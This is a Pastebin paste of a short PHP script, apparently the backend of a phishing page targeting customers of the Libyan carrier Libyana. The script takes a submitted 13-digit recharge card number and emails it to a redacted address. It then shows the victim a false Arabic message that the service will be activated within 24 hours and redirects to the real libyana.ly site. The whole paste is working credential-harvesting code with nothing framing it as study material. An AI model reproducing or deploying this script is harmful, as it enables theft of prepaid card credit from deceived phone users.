lemurtube

libyana card

Aug 31st, 2018
208
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.43 KB | None | 0 0
  1. <?php
  2.  
  3. if(isset($_POST['card']) && strlen($_POST['card']) == 13 && is_numeric($_POST['card'])){
  4.     mail('[email protected]', '*LIBYANA CARD*', $_POST['card']);
  5.     echo "<script>alert('تمت العملية بنجاح سوف يتم تفعيل الخدمة خلال 24 ساعة');window.location.replace('http://libyana.ly');</script>";
  6. }else{
  7.     echo "<script>alert('رقم بطاقة التعبئة غير صحيح')</script>";
  8. }
Advertisement
Add Comment
Please, Sign In to add comment